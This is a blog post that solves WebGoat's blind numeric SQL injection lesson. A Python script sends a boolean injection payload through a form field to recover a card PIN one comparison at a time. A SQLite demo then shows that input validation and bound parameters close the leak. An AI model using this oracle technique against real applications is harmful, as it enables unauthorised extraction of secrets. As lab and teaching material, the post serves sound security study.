Python/Webgoat

Blind numeric SQL injection

JAEJUNG 2021. 9. 2. 16:29
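import requests

# WebGoat lesson on localhost; JSESSIONID is the cookie of the logged-in session.
url = 'http://localhost:8080/WebGoat/attack?Screen=586116895&menu=1100'
cookie = {'JSESSIONID': '758026477EFE927534DDA6CCB9F2058A'}

# Boolean condition appended to a valid account number (101).
words = "101 and (select pin from pins where cc_number = '1111222233334444') >"


def pin_greater_than(n):
    """Return True if the page answers 'valid' (pin > n), False if 'Invalid'."""
    data = {'account_number': words + str(n), 'SUBMIT': 'GO!'}
    # requests sets the form-urlencoded Content-Type itself when data is a dict.
    res = requests.post(url, data=data, cookies=cookie)
    if 'Account number is valid' in res.text:
        return True
    if 'Invalid' in res.text:
        return False
    raise RuntimeError('unexpected response')


# Step 1: find the magnitude, the first k for which "pin > 10**k" is false.
index = None
for k in range(1, 10):
    if not pin_greater_than(10**k):
        index = k
        break
if index is None:
    raise SystemExit('pin is larger than the tested range')

# Step 2: the first i for which "pin > i" is false is the pin itself.
# The upper bound is inclusive because the pin may equal 10**index.
save = None
for i in range(0, 10**index + 1):
    if not pin_greater_than(i):
        save = i
        break

print(save)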
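
The script above works only because the lesson answers differently depending on whether the injected comparison is true. The following is an added example, not part of the original post or of WebGoat's source: it reproduces that true/false oracle against an in-memory SQLite database and shows that validating and binding the account number removes it. The `user_data`/`userid` names, the pin value and the exact response strings are assumptions.

```python
import re
import sqlite3

PROBE = "101 and (select pin from pins where cc_number = '1111222233334444') > "

def make_db():
    # Constructed data. pins/cc_number/pin come from the script above;
    # user_data/userid and the pin value 4321 are assumptions for this demo.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE user_data (userid INTEGER PRIMARY KEY);
        CREATE TABLE pins (cc_number TEXT, pin INTEGER);
        INSERT INTO user_data VALUES (101);
        INSERT INTO pins VALUES ('1111222233334444', 4321);
    """)
    return db

def respond(rows):
    return "Account number is valid" if rows else "Invalid account number"

def check_vulnerable(db, account_number):
    # Weak form: the field is concatenated into the SQL text, so anything
    # after the number is parsed as part of the WHERE clause.
    sql = "SELECT userid FROM user_data WHERE userid = " + account_number
    try:
        return respond(db.execute(sql).fetchall())
    except sqlite3.Error:
        return "Invalid account number"

def check_hardened(db, account_number):
    # Corrected form: accept digits only, then bind the value as a parameter.
    if not re.fullmatch(r"[0-9]{1,9}", account_number):
        return "Invalid account number"
    sql = "SELECT userid FROM user_data WHERE userid = ?"
    return respond(db.execute(sql, (int(account_number),)).fetchall())

def oracle_leaks(check):
    # True if two probes that differ only in the compared number get
    # different answers, i.e. the response reveals a bit about the pin.
    db = make_db()
    return check(db, PROBE + "1000") != check(db, PROBE + "10000")

if __name__ == "__main__":
    print("concatenated query leaks:", oracle_leaks(check_vulnerable))
    print("bound parameter leaks:  ", oracle_leaks(check_hardened))
```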
